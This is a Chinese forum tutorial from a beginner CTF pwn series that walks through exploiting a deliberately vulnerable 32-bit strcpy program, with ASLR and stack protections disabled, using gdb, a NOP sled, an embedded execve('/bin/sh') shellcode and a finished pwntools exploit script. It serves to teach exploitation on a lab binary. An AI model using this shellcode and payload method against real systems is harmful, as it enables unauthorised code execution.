首页
社区
课程
招聘
[原创]从0开始CTF-PWN(三)没有system怎么办?构造你的shellcode
2020-5-25 00:39 14239

[原创]从0开始CTF-PWN(三)没有system怎么办?构造你的shellcode

2020-5-25 00:39
14239

从0开始CTF-PWN(三)没有system怎么办?构造你的shellcode

作者:dxbaicai

1. 教程说明

1.1 历史回顾

2. 环境设置及编译说明

2.1 环境设置

为了降低入门难度,会关闭操作系统的地址空间随机化(ASLR),这是针对栈溢出漏洞被操作系统广泛采用的防御措施。

# 注意,下面是临时修改方案,系统重启后会被重置为2
echo 0 > /proc/sys/kernel/randomize_va_space

2.2 编译源文件

在实验环境创建.c源代码文件,使用如下命令进行编译。

gcc-4.8 -g -m32 -O0 -fno-stack-protector -z execstack -o [可执行文件名] [源文件名]

知识点-编译参数说明

  1. -m32:使用32位编译
  2. -O0:关闭所有优化
  3. -g:在可执行文件中加入源码信息
  4. -fno-stack-protector:关闭栈保护
  5. -z execstack:启用栈上代码可执行

3. 构造shell

3.1 pwn_test_bof2.c程序

我们来看这样一段程序:

#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
    char buf[128];
    if (argc < 2) return 1;
    strcpy(buf, argv[1]);
    printf("Input:%s\n", buf);
    return 0;
}

这次我们就只有一个main函数,main函数通过strcpy拷贝argv[1]到事先定义的buf数组中,然后将buf打印出来。根据上一节所学的知识,我们知道当argv[1]的长度超过128时,就会发生栈溢出,但是没有system函数可以给我们提供shell了,要怎么办呢?

  • 使用如下命令进行编译
    gcc-4.8 -g -m32 -O0 -fno-stack-protector -z execstack -o pwn_test_bof2_32-gcc4.8 pwn_test_bof2.c
    

3.2 构造特殊的栈结构

  • 栈结构回顾
    我们先来回顾一下上一节中关于函数调用与返回的栈结构。

stack_3

 

调用结束时,栈变化的核心任务是弹出被调用函数(callee)的状态,并将整个栈恢复到调用函数(caller)的状态。首先弹出被调用函数(callee)的局部变量,然后将栈上存储的调用函数(caller)的基地址从栈内弹出,并重新保存到ebp寄存器中,这样调用函数的基地址信息得以恢复,此时栈顶会指向返回地址。最后将返回地址从栈顶弹出,并保存到eip寄存器内,这样调用函数的eip指令信息得以恢复,指向了调用函数后的下一条语句。

  • 构造的栈结构
    注意上文最后一句“最后将返回地址从栈顶弹出...指向了调用函数后的下一条语句”,由于程序并没有关闭栈上可执行(编译时使用了-z execstack参数,也就是说可以在栈上执行代码),如果我们将函数的返回地址改到栈上,并在栈上放置我们精心准备过的获取shell的指令语句,使得函数返回时跳转到shellcode去执行。不就可以获得shell了吗?

stack3-1

 

**注意:此时虽然栈被弹出了,但只是栈顶指针的位置发生了变化,之前的写入内存的buf数组其数据并没有被清理(根据cdecl调用约定退出main函数时才被清理),所以我们可以用于跳转。

3.3 什么是shellcode

shellcode就是一串可以返回shell的机器指令码,在linux上典型的有:
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes)
对应代码为:

char shellcode[] =     "\xeb\x11\x5e\x31\xc9\xb1\x32\x80"
            "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
              "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
            "\x32\xc1\x51\x69\x30\x30\x74\x69"
            "\x69\x30\x63\x6a\x6f\x8a\xe4\x51"
            "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81";

shellcode本质就是就是一串机器码,执行后提供shell。

3.4 攻击思路

根据上面的分析,我们需要如下计算步骤:

  1. 找出buf变量地址。我们可以从buf一开始就写入shellcode,也可以填写一段padding后再写入shellcode。记录shellcode填充的位置。
  2. 找出main函数返回地址。
  3. 计算main函数返回地址与buf变量地址2者的偏移量,在填充完shellcode后,再填充差值长度的padding,使得可以覆盖返回地址,并将返回地址指向shellcode所在位置。

思路明确,我们现在开始来逐步调试。

  • 找出buf地址
    我们先随意输入一个字符串作为参数,调试过程中观察在执行完strcpy函数后特殊字符出现在哪个位置,即可快速判断buf的起始位置。
    # 开始调试
    gdb -q -args ./pwn_test_bof2_32-gcc4.8 AAAA
    starti
    

debug3_1

 

查看函数汇编代码后在strcpy的下一行下断点,并输入r(run)指令执行,这个时候已经完成了函数调用,另外在ret指令下第二个断点,从上一篇中我们知道,此时栈顶即为返回地址。

disassemble main
# 下断点
b *0x080491ae
b *0x080491c8

debug3_2

 

执行并观察断点1处时的栈空间:

# 执行
r
# 查看50空间的栈(由于buf数组较长,我们这里查看50长度的空间)
stack 50

debug3_3

 

可以看到buf的起始地址为0xffffd580,记录下来。

  • 找出main函数返回地址
    输入c继续执行到第二个断点,我们来验证下地址是不是上图中我们猜测的。
    # 继续执行
    c
    

debug3_4

 

可以看到确实是我们猜测的地址,在栈上的位置为0xffffd60c,另外也说明了可以通过类似<__libc_start_main+241>的关键字去找返回地址。

  • 计算偏移量差值,覆盖返回地址
    于是我们可以计算偏移量差值为140:

    gdb-peda$ p/d 0xffffd60c - 0xffffd580
    $2 = 140
    
  • 尝试构造Payload
    于是我们可以构造如下的payload结构,这里buf的起始地址位置就是填在返回地址所在位置:
    shellcode + padding + buf的起始地址

    # payload:shellcode(48字节) + padding(140-48=92字节) + buf的起始地址(注意要转换成小端序)
    "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "A"*(140-48) + "\x80\xd5\xff\xff"
    

    在命令行里执行,却发现报错了,是我们哪里出错了吗?

debug3_5

  • 问题分析
    其实这是因为我们一开始调试的时候用的是4位参数AAAA进行调试的,但是我们上面payload输入的是140+4位的长度,导致程序分配的buf的地址发生了变化,起始地址不在是0xffffd580。所以我们重新整理下解题思路应该如下:
  1. 先找出偏移量(偏移量不会变化)
  2. 输入偏移量+4长度的字符,获得此时buf的起始地址
  3. 构造payload

输入144位长度的字符作为参数,并检查返回地址是否被正确覆盖。这里输入:

# "A"*140+"CCCC"
gdb -q -args ./pwn_test_bof2_32-gcc4.8 $(python -c 'print "A"*140+"CCCC"')

debug3_6

 

重新执行上面的下断点步骤查看buf起始地址和函数返回地址,发现输入长度变化后确实起始地址也跟着变化了,同时验证了原来是main函数返回地址的位置已经被替换成了我们预计的CCCC,证明偏移量是没有发生变化的。

 

debug3_7

 

得到144输入长度下buf的起始地址应该为0xffffd4f0

  • 再次构造payload
    # 注意这里我们使用gdb来执行
    gdb -q -args ./pwn_test_bof2_32-gcc4.8 $(python -c 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "A"*(140-48) + "\xf0\xd4\xff\xff"')
    gdb-peda$ starti
    gdb-peda$ r
    
    可以看到我们终于成功得到了shell:

debug3_8

 

但是你会发现如果不在gdb中执行,直接外部执行——又报错了,这又是为啥呢?

  • 增加NOP链
    这是因为gdb在运行时,会往栈上添加许多进程使用的环境变量,导致栈的地址变低了,但是直接运行时,没有这些环境变量,所以地址会比gdb中查询获得的高。对于这个问题,我们可以NOP链来绕过。

知识点1-NOP指令
NOP指令,也称作“空指令”,在x86的CPU中机器码为0x90(144)。NOP不执行操作,但占一个程序步。——也就是说当遇到NOP指令的时候,程序不会做任何事,而是继续执行下一条指令。

 

我们可以改造一下payload,在头部放上一段NOP指令,然后再跟上shellcode,并适当偏移之前的buf起始地址,这样当返回地址指向这段NOP指令中的任意一个地址时,因为NOP空指令的关系,会一直找下去,直到遇到shellcode,这样就大大提高了命中率。对于栈可执行程序而言,这是一种很有效的命中方式。

  • 增加链后的payload
    我们计划插入60长度的NOP,并把上面查询获得的buf地址+60
    # 使用python快速计算
    >>> hex(0xffffd4f0+60)
    '0xffffd52c'
    
    构造payload
    ./pwn_test_bof2_32-gcc4.8 $(python -c 'print "\x90"*60 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "A"*(140-48-60) + "\x2c\xd5\xff\xff"')
    
    执行得到shell:

debug3_9

 

知识点2-使用pwntools.cyclic()快速定位偏移量
这里补充一个快速定位偏移量的好工具cyclic()

 

在本例中,这样使用:

# 进入python并加载pwntools
root@kali-linux:~# python
>>> from pwn import *
# 生成一个200长度的有序字符串
>>> cyclic(200)
'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
>>>

然后将这个串作为参数输入程序:

gdb -q -args ./pwn_test_bof2_32-gcc4.8 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
gdb-peda$ starti
gdb-peda$ r

会看到如下输出:

 

cyclic3_1

 

这里的0x6261616b表示函数返回到这个地址了,我们把这个放到cyclic_find()里找一下,可以看到返回了正确的偏移量。

>>> cyclic_find(0x6261616b)
140

3.6 pwntools实现

这里提供了pwntools攻击的实现。

# coding:utf-8
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
payload = "\x90" * 60
# shellcode
payload += "\xeb\x11\x5e\x31\xc9\xb1\x32\x80"
payload += "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
payload += "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
payload += "\x32\xc1\x51\x69\x30\x30\x74\x69"
payload += "\x69\x30\x63\x6a\x6f\x8a\xe4\x51"
payload += "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"
payload += "A" * (140 - 48 - 60) + p32(0xffffd52c)
p = process(argv=['/home/pwn/test/pwn_test_bof2_32-gcc4.8', payload])
p.interactive()

4. 总结

我们再来回顾下我们是如何自己构造一个shell的:

  1. 先找出偏移量(可以利用cyclic工具)
  2. 输入偏移量+4长度的字符,获得此时buf的起始地址
  3. 构造payload:
    NOP*N + shellcode + padding*(偏移量-shellcode长度-NOP长度) + (shellcode地址)
    

我们现在知道了怎么构造自己的shell了,但是这一切都是建立在栈上代码可以执行这一基础上的,现在的应用大部分都不太可能打开-z execstack参数了,那么我们继续思考,当栈不可执行时,我们又要怎么获得Shell呢?


[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。

最后于 2020-5-25 10:09 被dxbaicai编辑 ,原因: 修改图片链接
上传的附件:
收藏
点赞3
打赏
分享
最新回复 (5)
雪    币: 1928
活跃值: (392)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
TopGreen 2020-5-30 09:42
2
0
请问gdb调试与常态运行的区别在哪里可以找到资料
雪    币: 1110
活跃值: (544)
能力值: ( LV3,RANK:35 )
在线值:
发帖
回帖
粉丝
王嘟嘟 2020-6-19 19:49
3
0
我这里生成的弄起来好像有点问题。。。。可能是环境没弄对。。。。
雪    币: 2886
活跃值: (599)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
dxbaicai 1 2020-6-22 23:11
4
0
王嘟嘟 我这里生成的弄起来好像有点问题。。。。可能是环境没弄对。。。。
可以先按第一篇里的设置下环境,如果还有问题,可以把具体的报错贴出来
雪    币: 2886
活跃值: (599)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
dxbaicai 1 2020-6-22 23:13
5
0
TopGreen 请问gdb调试与常态运行的区别在哪里可以找到资料
gdb调试我的理解就是逐步执行,执行过程中你可以方便的观察甚至改动。gdb的资料可以看看这个:
https://www.cnblogs.com/arnoldlu/p/9633254.html
雪    币: 1928
活跃值: (392)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
TopGreen 2020-7-14 19:45
6
0
dxbaicai gdb调试我的理解就是逐步执行,执行过程中你可以方便的观察甚至改动。gdb的资料可以看看这个: https://www.cnblogs.com/arnoldlu/p/9633254.html
但是你会发现如果不在gdb中执行,直接外部执行——又报错了,这又是为啥呢?

增加NOP链
这是因为gdb在运行时,会往栈上添加许多进程使用的环境变量,导致栈的地址变低了,但是直接运行时,没有这些环境变量,所以地址会比gdb中查询获得的高。对于这个问题,我们可以NOP链来绕过 
我想问的是这个
游客
登录 | 注册 方可回帖
返回